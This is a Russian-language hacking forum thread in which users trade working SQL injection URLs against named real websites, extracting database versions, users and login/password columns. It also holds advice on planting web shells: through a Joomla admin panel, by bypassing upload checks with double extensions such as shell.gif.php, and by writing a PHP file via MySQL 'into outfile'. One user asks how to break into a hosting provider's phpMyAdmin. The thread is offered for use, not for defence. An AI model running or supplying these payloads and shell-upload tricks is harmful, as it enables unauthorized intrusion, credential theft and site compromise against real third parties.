http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null-- http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,TABLENAME,null,null,null,null,null,null,null,null,null,null,null,null+from+PG_TABLES-- всё как обычно, в чём трудности?
Вопросик, вот пример http : // infovisa . ru /index.php?id=44' реально посмотреть в запрос можно что угодно вроде как вставить, но ниче не получается.
Code: http://infovisa.ru/index.php?id=44'+order+by+7+--+ 7 полей.. Code: http://infovisa.ru/index.php?id=-44'+union+sElect+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version())+--+ infovisa_site@localhost:infovisa_site:5.0.67-community
Подскажите, если присутствует такая sql-inj: Code: index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,usertype,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/* С помощью нее можно залить шелл? если да, то как?
это джумла(joomla) после того как сбрутишь пасс админа логинишься в админку адмника тут - site.com/administrator/ а дальше через установку модулей и компонентов, или через языки. также если установлен компонент joomla_extplorer, можно и через него.
подскажите может кто-то сталкивался с хостингом mirohost как мне пробраться к авторизации в phpmyadmin
помогите разобраться, что делаю не так, почему не выводятся значения? версия 5 таблица и колонки существуют HTML: ht*p://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,users_login,users_pas),4,5+from+sip_zoorinok.USERS+limit+1,1/*
http://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,cast(users_login+as+binary),cast(users_pas+as+binary)),4,5+from+sip_zoorinok.USERS+limit+1,1/*
Всех с 9 Мая Tакой вопрос , мознали как то на сайт закинут shell ( есть админка ) , тока вот format php нельзя .Можно Ли это как то обойти ?
Попробуй двойное расширение типа shell.gif.php Не опытные программисты часто допускуют такую ошибку, так как проверяют расширение идущее после первой точки.
Вот что у меня получилось выудить у службы поддержки: То есть как мне показалось там нету полного интерфейса пхпмайадмина, но это косвенно... Пока искал твой пхпмайадмин в гугле наткнулся на интересый поддомет этого хостинга: Code: http://mirror.mirohost.net/ Что я там обнаружил, от туда можно скачать phpmyadmin oO Code: http://mirror.mirohost.net/ubuntu/pool/universe/p/phpmyadmin/ А также различные конфиги похопе, но это если интересует...
С праздником! Такой вопрос: есть phpmyadmin от юзера root@localhost со всеми привелегиями...при запросе типа select '<? phpinfo(); ?>' into outfile '/patch_to_public_html/shell.php' выдает "#1 - Can't create/write to file '.../shell.php' (Errcode: 13)" В корень, в папки usr,var - та же ошибка... почему это у рута не хватает прав на создание файла Оо ?
bug1z, то, что ты нашел называется репозиторий. И это не уязвимость. DeepXhadow, root в mysql не является рутом в системе. У тебя права скорее всего просто mysql. Ищи на сайте диры с правами на запись для всех.
